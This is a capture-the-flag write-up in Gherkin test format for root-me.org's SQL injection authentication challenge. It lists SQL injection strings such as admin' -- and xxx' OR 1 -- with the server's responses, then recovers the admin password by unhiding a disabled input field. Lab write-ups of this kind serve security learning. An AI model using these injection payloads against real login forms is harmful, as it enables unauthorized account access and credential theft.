## Version 2.0
## language: en

Feature: sql-injection-authentication -web-server -rootme
  Site:
    root-me.org
  Category:
    Web-Server
  User:
    neds
  Goal:
    Retrieve the administrator password

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali Linux      | 2019.3      |
    | Firefox         | 60.8.0esr   |
  Machine information:
    Given I am accessing the web page through the browser
    And I login to the challenge page

  Scenario Outline: Fail: SQL injections on password field
    Given There is a form to log in
    When I type credentials user = <Username>, password = <Password> and submit
    Then I get this message = <Message>
    Then I cannot get the flag

    Examples:
    | <Username> | <Password>    | <Message>                                |
    | admin      | admin         | no such user/password                    |
    | xxxxx      | xxx') OR 1 -- | Unable to prepare statement: 1, near ")" |
    | xxxxx      | xxx' OR 1 --  | Welcome back user1                       |

  Scenario: Success: SQL injection on username field
    Given I try the injection "user = admin' -- and password = xxx"
    When I type credentials and submit
    Then I get the credentials for admin on a disabled input
    When I inspect the element
    And I change its property "type = 'password' to type = 'text'"
    Then the password is visible
    Then I get the flag
